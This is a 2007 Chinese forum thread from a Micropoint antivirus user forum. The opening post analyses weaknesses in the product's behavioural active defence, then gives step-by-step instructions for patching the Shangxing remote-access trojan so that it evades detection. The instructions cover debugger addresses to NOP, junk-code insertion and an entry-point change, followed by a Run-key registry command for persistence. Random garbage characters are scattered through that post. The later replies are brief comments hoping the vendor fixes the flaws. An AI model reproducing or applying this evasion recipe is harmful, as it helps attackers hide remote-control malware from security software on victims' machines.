nonlinear
新手上路
积分 30
发帖 30
注册 2007-9-25
|
#1 绕过微点主动防御可行性的分析(转的)
也不知道能不能有用,今天在远景论坛找DefenseWall资料的时候看到的,一直想为微点做点什么(微点预升级板一直在用,但还没遇到过什么大问题)。
这是该网页地址 http://bbs.pcvista.cn/read.php?tid=14026
转载注明 http://hi.baidu.com/zqinyan/ |EKu�2We*�
E�I��jI!0j
微点的主动防御确实是一种对付免杀病毒,变种病毒,家族病毒乃至未知病毒的一种行之有效的方法。 b_TS��<�,�
此方法抛弃了传统的特征码对比识别的落后局面 对于病毒编写者来说 无疑是巨大的打击 oH^�(qZ8W�
Q8D&tJg��
主动防御是对付病毒的杀手锏 那么是否就是完美的防御手段了呢?它都有那些特点呢?它是不是也有一些不足之处能够被恶意利用呢? ,�E;;wd�It
r X'�*|�]
:O�-iykXyI
========== :�~F�:/5�
r%@�Lej5+
� �6e,xDr
�g�{�IF_ 1
XV�3�C`�:b
dU)�]:>Uz
1、在实际使用微点的过程中可以发现,在识别病毒时,微点总是在病毒已经运行了一会后,才弹出来提示框。也就是说,微点在拦截到某程序的前后一系列API动作后,需要将拦截到的动作与行为知识库中的记录进行对比,用以判断该程序是否为病毒。 ~{h�xR)�x9
�N|N3x7=gs
也就是说从拦截程序的API动作到行为识别之间有一个时间差 ��@ "�a6fn
\B �F*m"lz
n0Y+b[ +wj
W} WI; cI
8�fA�_p}wp
Uc/+g�z Z;
F, U*���yj
2、通过大量实验可以得出 微点具有一个临时规则的功能 并且该功能生成的临时规则在计算机重启之前都能一直生效 W3`>8v�1?o
�t7�8�k4�?
用过微点的用户都知道,当微点通过主动防御发现一个病毒后,会有询问框出现,让用户选择是允许还是阻止,当选择阻止后,会出现询问框让用户选择是删除还是不删除。 3?�Y�2L��
�WJI[9@^I~
不论是选择阻止/删除 还是 允许/不删除,微点都会将此选择添加为临时规则 �9UvX�C)R1
R<B7K?SxV~
如果是选择阻止/删除,那么在重启之前,遇到相同路径和hash值的文件都会阻止或者删除;如果是选择 允许/不删除,那么在重启之前,遇到相同路径和hash值的文件就都会放行 AT5aD�Eb^^
N�k {XdrY�
并且微点还会记录下父进程,如果同一父进程,第一次的操作没报,但是如果第二次的操作是有害的,那么如果在第二次选择删除的话,那么微点会把在第一次操作生成的文件连同父进程一起让用户选择删除。 z�=�$j��GL
#s!'+|2�n�
这真是一个很神奇的功能 也许也是一个不足之处 �zn�J'iV f
37; $�-cFE
cV`E>w=D0
>2By +/!X
t�!I �aUW
�]�D,MiDph
=~+D�UMBT�
3、微点之所以能够发现未知病毒 是建立在大量的对病毒行为分析的基础之上的 5/O'R9A4�
san,|yrMn�
比如auto类病毒,都需要通过autorun.inf这个文件来运行,然后对系统进行破坏 那么一个程序 如果具有以下auto类病毒的常见动作 既可被微点报为auto病毒 哪怕这个病毒是微点还为收集到的 也就是未知的病毒 ��Re�u*Pe�
`~cuQ<3Tn
1、通过autorun.inf文件运行 2、向系统目录创建文件 3、向本地磁盘跟目录创建文件 4、修改一些注册表(如启动项 服务) f0T� ,�ul,
n>�'Kp T9|
但是别忘了,微点是通过一系列动作的对比来确定是否为病毒的 所以这也是正规光盘在自启动时不会被报病毒的原因所在 �L� d���n8
lq"f[-8a2q
那么,如果将病毒的一系列行为拆散,使之不能联贯;或者将动作减少,使之与行为分析库中的动作对不上号 HfLLlH<L`&
@ps1Dr��4s
那么 微点还能报病毒么? 事实是,对于这类单一的动作而言,微点不会报病毒,但是有可能会报危险动作(重要单一API动作报警) ~�g7l8H67
R�V&^g�*;E
eu|j=mB �
3R�&lqxhg
q:<{% ��U$
=========== ezn�y��pY=
V i&*�&"�q
9�h0�X&1u
�Gy[O)PEEh
~y$ !4�8o
于是,可以结合以上所发现的不足之处 来绕过微点主动防御的监控。 -8N|xQ�378
可参见以下2贴 rDd�zxrKg{
,&4�qg�p{)
http://bbs.deepin.org/htm_data/207/0710/342647.html Bb{!Yh].:A
http://bbs.kafan.cn/viewthread.php?tid=139077&extra=page%3D1 � �J1XL<�7
`�Bn=�?��9
如以上贴中所录制的视频既是利用了上面所分析的不足之处 I�\� | � N
dO7;}>F$n�
里面的那个vbs脚本的作用就在于无窗口运行spbic.exe (利用的第三点) 运行成功后,未等微点将拦截到的动作与行为库里的记录对比便立即重启(利用的第一点) 所以该病毒能够绕过微点的主动防御并存活下来 � _ �q(�Q
vV�T���?h
如果继续对该病毒的破坏动作进行修改,那么,重启之后 由于无法与现有行为库里的行为进行有效对比,那么微点也会对该病毒放行 (利用第三点) I?Q+9Rmm`J
oPK�XZ�U(c
2i��|B�=D(
希望微点官方能够设法弥补以上的不足之处。 5jq��=_mHt
>��N�V=LOO
A�<YsfDa_d
�V����F0dE
========================= �!PUp>�(�
y,+[$u7h�
4�}KU>9YRA
)�"O{D`uX
i� RmQ5ezk
4f1D*id*`#
�'t>r sp+#
K�^i"9D�)A
附:对上兴的修改,过微点的主动防御(利用第三点) ? J��|4l[x
@oH�[S��Wx
0P 5BA�rJ?
上興是2007sp3 http://hi.baidu.com/98223上破解的這個 !�7�`� [�i
上興生成的時候什么都不要選 生成以后先改文件特征碼 0009B71D_00000001(通用的) cCng5Nq,c�
H%.z�XQ4}n
od載入 (內存地址或許會有不同吧 ..) U1^l�+G^,~
0049BADA E8 11F7FEFF call r_server.0048B1F0 '?}��R4w|)
0049BADF 33C0 xor eax,eax ;F,q�S0lzE
0049BAE1 5A pop edx /W9 �&�Ke�
0049BAE2 59 pop ecx 0�0,9a�zs
0049BAE3 59 pop ecx �1���04!!m
0049BAE4 64:8910 mov dword ptr fs:[eax],edx f#mx:Q.7�I
d��"!yD/RD
全部nop掉 這樣上興就不會生成服務(其實這是我一開始做的 ..) wE�K%T P4
`�;�}�H%
0049BB0C E8 F7B6F6FF call <jmp.&kernel32.WinExec> - &NQ \W�
0049BB11 33C0 xor eax,eax C��;�%Y\S
把 xor eax,eax改為int 21 (>�m�i!�:�
6�#O�#T;f)
在此處加花 ] Z�DT���n
0049C322 B�%� 2L1T=
-------------------- Z�WFG?�8lJ
xor eax,eax �M5F(<,n;�
pushad xv�^Sh}\�}
popad '7t|I�6$ow
jmp 0049C28C {��>� �wI8
-------------------- sZ]'DH&_�(
0049C28C 是原入口點 jY��rym�-
�C�/CN�� '
用loadpe改入口點為0049C322 yQ8�M >H#J
至此做出來的上興已經是可以過微點的殺毒模塊了(防火墻過不了) ;0;3BH� A
而且上線和遠端控制也沒有問題 m�~�##q}LZ
mgo'M W\ �
但是其本身不會添加任何啟動項 需要其余文件執行 6lN?)<uQ
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v spbat /t REG_SZ /d "c:\program files\common files\microsoft shared\msinfo\test.exe" /f 這命令來加入啟動項 這樣才能讓它在重啟后繼續運行 '&R�Z3�@}+
�lO55�1Y^�
或者reg import 1.reg M7`UoTc+>d
1.reg的內容: g ^���D)x[
Windows Registry Editor Version 5.00 w~bG�<kx�P
$ 1�ak �I
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] D�H}s1mNMP
"test"="c:\\program files\\common files\\microsoft shared\\msinfo\\test.exe" 0�l��L�r[�
[ Last edited by nonlinear on 2007-10-25 at 20:09 ]
| |
※ ※ ※ 本文纯属【nonlinear】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
2007-10-24 21:34 |
|
998csc
中级用户
积分 304
发帖 304
注册 2007-2-2
来自 sz
|
#2
看的好辛苦啊.
| |
※ ※ ※ 本文纯属【998csc】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
[原创] 日出东方红胜火 月落微点俏如兰
[又一] 日出东方红胜瑞 月上微点妙摘星
关怀入微,点滴不尽,全心全意全为你!信任你我的微点! |
|
|
|
2007-10-24 21:59 |
|
same999
新手上路
积分 8
发帖 8
注册 2007-10-22
|
#3
看起累,而且还没明白,希望转载的时候弄个清楚的
| |
※ ※ ※ 本文纯属【same999】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-10-25 11:29 |
|
kahaixiao007
高级用户
积分 813
发帖 813
注册 2007-10-1
|
#4
楼主最后再编辑整理一下……
辛苦了……
| |
※ ※ ※ 本文纯属【kahaixiao007】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
操作系统:Vista 家庭高级版 正版
微点版本:实时更新,最新版本 |
|
|
|
2007-10-25 12:00 |
|
peter0605
银牌会员
积分 2083
发帖 2065
注册 2007-9-11
来自 宁波,杭州。。。
|
#5
以前有看到过。。。但是这样放出来了应该解决了吧?
| |
※ ※ ※ 本文纯属【peter0605】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-10-25 12:05 |
|
kahaixiao007
高级用户
积分 813
发帖 813
注册 2007-10-1
|
#6
关键是天下万物,有盾就有矛,矛和盾始终在较量,不断的发展,关键是看哪个盾的应变性安全性更好……
| |
※ ※ ※ 本文纯属【kahaixiao007】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
操作系统:Vista 家庭高级版 正版
微点版本:实时更新,最新版本 |
|
|
|
2007-10-25 12:11 |
|
Linwin
高级用户
积分 956
发帖 946
注册 2007-5-16
|
#7
放出来后,要MP去想办法解决呀...
| |
※ ※ ※ 本文纯属【Linwin】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
windowsXP VOL+卡巴斯基 安全部队+微点 |
|
|
|
2007-10-25 12:19 |
|
anpro
新手上路
积分 9
发帖 9
注册 2007-10-25
|
#8
值得研究!微点在对病毒的防御,一般建立在对可疑文件活动的分析上,这方面涉及到操作系统的底层技术,相对于普通杀软,难度要大一些。
| |
※ ※ ※ 本文纯属【anpro】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-10-26 08:35 |
|
zwh_zyc168
注册用户
积分 62
发帖 62
注册 2007-9-25
|
#9
看了下,希望官方参考下,看微点是否存在或者修改此类问题,并作以公告别让新手误导了呀,!
楼主给你加10分呵呵
| |
※ ※ ※ 本文纯属【zwh_zyc168】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-10-26 09:35 |
|
海之魂
中级用户
积分 208
发帖 204
注册 2007-9-19
来自 消失的大陆
|
#10
既然提出来了,就看微点如何堵漏啦。
| |
※ ※ ※ 本文纯属【海之魂】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2007-10-26 12:53 |
|
